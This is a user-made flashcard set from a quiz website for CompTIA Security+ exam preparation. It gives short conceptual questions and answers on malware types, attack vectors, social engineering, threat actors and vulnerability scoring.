CompTIA Security+ Cert Prep 1: Threats, Attacks, and Vulnerabilities

¡Supera tus tareas y exámenes ahora con Quizwiz!

What presents itself to be legitimate software but delivers a malicious payload behind the scenes?

Trojan Horses

Most programs run in what type of less privileged mode?

User Mode

Name 2 types of code based malware

1. Backdoors 2. Logic Bombs

Name common attack vectors?

1. Emails 2. Social Media 3. Removable Media 4. Card Skimmers 5. Cloud Services 6. Network/Wireless Network 7. Supply Chain 8. Direct Access

What are the 4 steps used for a Botnet Network?

1. Hacker first infects a system with malware. 2. Once they gain control of the system they join with other infected systems to create a Botnet Network. 3. The system lies dormant awaiting instructions. 4. The hacker will then send instructions to the botnet through command-and-control mechanism to perform the malicious act.

Name 3 ways to avoid malware.

1. Installing and keeping Antivirus Software current 2. Applying Security Patches 3. Educate users about the dangers of malware.

What are ways to prevent insider attacks?

1. Perform background checks on potential employees. 2. Follow the principal of least privilege 3. Use two person control for very sensitive transactions. 4. Implement a mandatory vacation policy for critical staff.

What are the 3 Hack Colors?

1. White Hats 2. Black Hats 3. Gray Hats

First worm was released in what year and by whom? The worm was known as the RTM Worm and it infected 10% of the internet.

1988; Robert T Morris

Name the most popular Macro Script Language.

VBA (Visual Basics for Applications)

What spreads from system to system based on human action?

Viruses

What CVSS value is the threshold at which PCI DSS requires remediation to achieve a passing scan? A. 4 B. 5.5 C. 6 D. 8

A. 4

Which one of the following metrics does not contribute to the exploitability score for a vulnerability in CVSS? A. Confidentiality B. User Interaction C. Attack Vector D. Attack Complexity

A. Confidentiality

Which one of the following is not an example of an open source intelligence resource? A. IP Reputation Service B. Social Media C. Security Website D. Government Security Analysis Center

A. IP Reputation Service

What security technology best assists with the automation of security workflows? A. SOAR B. IPS C. SIEM D. CASB

A. SOAR

Randy is developing a vulnerability management program. Which one of the following is not a common source of requirements for such a program? A. Sales Team Requests B. Legal Requirements C. Security Objectives D. Corporate Policy

A. Sales Team Requests

In what type of social engineering attack does the attacker physically observe the victim's activity? A. Shoulder Surfing B. Tailgating C. Dumpster Diving D. Phishing

A. Shoulder Surfing

It is difficult to develop defenses against APT attackers. A. True B. False

A. True

It is generally a bad practice to run software after the vendor's end of life. A. True B. False

A. True

Which one of the following types of malware can spread without any user interaction? A. Worm B. Back Door C. Trojan Horse D. Virus

A. Worm

These state actors employ extremely advanced tools and are very difficult to detect?

APT Group (Advanced Persistent Threat Group)

What does APT (APT Groups) stand for?

Advanced Persistent Threat

_____ is a malware that has the specific purpose of displaying advertisements, but instead of generating revenue for the content owner, this generates revenue for the malware author.

Adware

What two malwares often come packaged together through software a user actually wants to download? Often times the click through installer tricks the user into granted them access or obtaining access without permission.

Adware and Spyware

_____ are integrated into software applications and are allowed interaction with that application in a programmatic manner.

Application Scripts

Paths that attackers use to gain initial access?

Attack Vectors

As Dave works with his colleagues in other IT disciplines, he notices that they use different names to refer to the same products and vendors. Which SCAP component would best assist him in reconciling these differences? A. CVE B. CPE C. CVSS D. OVAL

B. CPE (Common Platform Enumeration)

Helen has vulnerability scanners located at several points on her network. Which one of the following scanners is likely to provide the most complete picture of the vulnerabilities present on a public web server? A. External Scanner B. DMZ Scanner C. User Subnet Scanner D. Intranet Scanner

B. DMZ Scanner

The analysis of adversary TTP includes tools, techniques, and policies. A. True B. False

B. False

Matt would like to limit the tests performed by his vulnerability scanner to only those that affect operating systems installed in his environment. Which setting should he modify? A. Ping Type B. Plug-Ins C. Safe Checks D. Sensitivity Level

B. Plug-Ins

What language is commonly used to automate the execution of system administration tasks on Windows systems? A. Bash B. PowerShell C. Python D. Ruby

B. PowerShell

In what technique do attackers pose as their victim to elicit information from third parties? A. Spoofing B. Pretexting C. Skimming D. Phishing

B. Pretexting

Dan is engaging in a password cracking attack where he uses precomputed hash values. What type of attack is Dan waging? A. Brute Force B. Rainbow Table C. Hybrid D. Dictionary

B. Rainbow Table

Cryptolocker is an example of what type of malicious software? A. Adware B. Ransomware C. Spyware D. Trojan Horse

B. Ransomware

Which one of the following issues is not generally associated with the use of default configurations? A. Extraneous Services Running B. SQL Injection Flaws C. Open Ports D. Vendor-Assigned Passwords

B. SQL Injection Flaws

What type of website does the attacker use when waging a watering hole attack? A. Software Distribution Site B. Site Trusted by the End User C. Hacker Forum D. Known Malicious Site

B. Site Trusted by the End User

Where do fileless viruses often store themselves to maintain persistence? A. Memory B. Windows Registry C. BIOS D. Disk

B. Windows Registry

Name the Script Language used for Mac and Linux.

BASH (Bourne-Again Shell)

_____ occur when a programmer provides a means to grant themselves or others further access to a system.

Backdoors

These hackers do not have permission of the target and hack with malicious intent?

Black Hats

_____ are collections of zombie computers used for malicious purposes.

Botnets

What approach to threat identification begins with a listing of all resources owned by the organization? A. Likelihood-focused B. Threat-Focused C. Asset-Focused D. Service-Focused

C. Asset-Focused

What is the basic principle underlying threat hunting activities? A. Fail-Sasfe B. Default Deny C. Assumption of Compromise D. Least Privilege

C. Assumption of Compromise

Which one of the following controls is not particularly effective against the insider threat? A. Least Privilege B. Background Checks C. Firewalls D. Separation of Duties

C. Firewalls

Which of the following is a common command-and-control mechanism for botnets? A. FTP B. SMTP C. IRC D. HTTP

C. IRC (Internet Relay Chat)

What type of malware delivers its payload only after certain conditions are met, such as specific date and time occurring? A. Worm B. Ransomware C. Logic Bomb D. Trojan Horse

C. Logic Bomb

What type of artificial intelligence technique is most commonly associated with optimization? A. Proactive Analytics B. Descriptive Analytics C. Prescriptive Analytics D. Predictive Analytics

C. Prescriptive Analytics

Which of the following is a standardized language used to communicate security information between systems and organizations A. CybOX B. TAXII C. STIX D. CVSS

C. STIX

Linda's organization recently experienced a social engineering attack. The attacker called a help desk employee and persuaded her that she was a project manager on a tight deadline and locked out of her account. The help desk technician provided the attacker with access to the account. What social engineering principle was used? A. Social Proof B. Authority C. Urgency D. Scarcity

C. Urgency

What attack vector uses devices attached to ATMs, gas pumps, and/or other magnetic reader machines, which will read the data from the magnetic strip, copy that data that can then be cloned for use elsewhere?

Card Skimmers

What attack vector does attackers scan regularly to find improper access controls, systems that have security flaws, or accidentally published API keys (Application Programming Interface Key) or passwords?

Cloud Services

What does the acronym CVSS stand for?

Common Vulnerability Scoring System

_____ is a form of malware that takes over the computing capacity of a user's system and uses that capacity to mine cryptocurrencies.

Cryptomalware

Data breaches violate which principle of cybersecurity? A. Integrity B. Availability C. Non-Repudiation D. Confidentiality

D. Confidentiality

The reuse of passwords across multiple sites makes an individual susceptible to _____ attacks. A. Rainbow Table B. Password Spraying C. Brute Force D. Credential Stuffing

D. Credential Stuffing

Jason recently investigated a vulnerability discovered during a scan and, after exhaustive research, determined that the vulnerability did not exist. What type of error occurred? A. False Negative B. True Negative C. True Positive D. False Positive

D. False Positive

What type of attacker is primarily concerned with advancing an ideological agenda? A. APT B. Script Kiddie C. Organized Crime D. Hacktivist

D. Hacktivist

What type of organization facilitates cybersecurity information sharing among a industry-specific communities? A. CIRT B. CERT C. InfraGard D. ISAC

D. ISAC

Renee is creating a prioritized list of scanning targets. Which one of the following is the least important criteria for her prioritization? A. Network Exposure B. Information Sensitivity C. Services Installed D. Operating System

D. Operating System

What device is often used in card cloning attacks? A. Malicious USB B. Unsecured Network C. Smart Card D. Skimmer

D. Skimmer

What type of phishing attack focuses specifically on senior executives of a targeted organization? A. Pharming B. Spear Phishing C. Vishing D. Whaling

D. Whaling

What attack vector sends phishing messages and messages containing malicious attachments and links directly to the user?

Emails

What avoids detection of simple antivirus software and operate completely in a computers memory?

Fileless Viruses

What can maintain persistence on a system by writing a copy of themselves to the Windows Registry, where they can instruct Windows to load them back into memory after a reboot?

Fileless Viruses

These hackers do not have permission of the target but hack with the motivation of helping their victims improve their security?

Gray Hats

Attackers seeking to use their hacking skills to advance a political or social agenda are called?

Hacktivists

What is a common command-and-control mechanism for botnets?

IRC (Internet Relay Chat)

What threats are considered the most costly and dangerous attacks?

Insider Threats

What does IRC stand for?

Internet Relay Chat

Operating Systems run in what highly privileged mode?

Kernel Mode

What type of malware delivers its payload only after certain conditions are met, such as specific date and time occurring?

Logic Bomb

_____ are malware that is set to execute. payload after conditions are met.

Logic Bombs

What attack vector do attackers exploit with direct access to a jack or port in an unsecured public area?

Network

What is the term given to the malicious action that malware performs?

Payload

Name the Script Language used for Windows

PowerShell

What language is commonly used to automate the execution of system administration tasks on Windows systems?

PowerShell

What attacks can take a normal user's credentials and transform them into super user accounts?

Privilege Escalation Attacks

What is term given to the way that a malware object spreads?

Propagation Mechanism

Name the most popular Programming Script Language.

Python

What provided hackers with the ability to remotely access and control infected systems?

RAT (Remote Access Trojans)

Cryptolocker îs an example of what type of malicious software?

Ransomware

_____ blocks a user's use of a computer or data until a set amount has been paid.

Ransomware

What attack vector uses physical devices or drives to spread malware? Attackers will leave those devices or drives in locations such as parking lots, airports, or other public areas hoping that someone will find the drive and plug it into their system.

Removable Media

Hackers will gain access to a normal user's account on a system and then use a _____ to obtain superuser access.

Rootkit

_____ are a type of malware designed for privilege escalation.

Rootkits

Attackers who are hacking just to see if they can break into a system are known as?

Script Kiddies

_____ are a sequence of instructions that a developer provides to a computer, telling it how to execute a series of steps.

Scripts

What does the acronym SCAP stand for?

Security Content Automatic Protocol

Technology brought into he organization by individual employees without the approval of technology leaders?

Shadow IT

_____ are designed to be run at the command line and are typically integrated with the operating systems.

Shell Scripts

What attack vector spreads malware in the same way as emails but by using a often used application as a part of an influence campaign, designed to gain the trust of users who can then be tricked into granting unauthorized access to information or systems?

Social Media

Keystroking, monitoring for visits to capture credentials, targeting the system hard drive or cloud base storage used by the user to seek out sensitive information is what form of malware?

Spyware

_____ is a malware that gathers information without the user's knowledge or consent. It then reports that info back to the malware author, who can use it for any purpose.

Spyware

What was the first worm to cross the virtual/physical barrier?

Stuxnet (2010)

What is the attack vector where attackers try to interfere or obtain devices prior to them getting to the organization?

Supply Chain

These hackers work with full permission of the target, and have the motivation of finding security flaws that can be fixed?

White Hats

Where do fileless viruses often store themselves to maintain persistence?

Windows Registry

What attack vector do attackers not need to have physical access but can access via the parking lot nearby or through poor security?

Wireless Network

Which type of malware can spread without any user interaction

Worm

What spreads from system to system without any human interaction?

Worms


Conjuntos de estudio relacionados

10. AWS CCP Knowledge Review - Shared Responsibility Model

View Set

AZ-900: Microsoft Azure Fundamentals (Q&A Series - 2023)

View Set

Fin 341 Chapter 5 and rest of section 3

View Set

Evaluate schema theory with reference to research studies

View Set

ACCT 212 Chapter 8: Master Budgeting

View Set